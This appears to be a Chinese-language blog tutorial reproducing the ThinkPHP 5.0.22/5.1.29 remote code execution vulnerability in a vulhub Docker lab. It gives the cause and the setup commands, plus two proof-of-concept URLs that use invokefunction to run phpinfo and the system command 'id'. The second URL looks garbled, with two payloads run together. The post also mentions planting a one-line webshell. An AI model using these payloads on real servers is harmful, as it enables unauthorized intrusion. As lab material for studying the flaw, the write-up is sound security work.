Thinkphp RCE
0x00 漏洞原理
ThinkPHP是国内使用极为广泛的PHP开发框架。在其版本 5 中,由于框架处理控制器名称不正确,如果网站未启用强制路由(这是默认设置),它可以执行任何方法,从而导致 RCE 漏洞。
0x01 影响版本
Thinkphp =5.0.22 / 5.1.29
0x02 环境搭建
cd vulhub-master/thinkphp/5-rce #进入vulhub靶场
docker-compose up -d
0x03 漏洞复现
访问http://your-ip:8080,可以看到ThinkPHP的默认页面
POC1
http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
访问该POC1可以看到执行了phpinfo
POC2
http://192.168.68.168:8080//index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
访问POC2可以看到执行了id
用工具探测,成功探测到该漏洞
写入一句话木马
成功连上执行命令
参考链接
https://vulhub.org/#/environments/thinkphp/5-rce/
https://www.freebuf.com/articles/web/274062.html
本文含有隐藏内容,请 开通VIP 后查看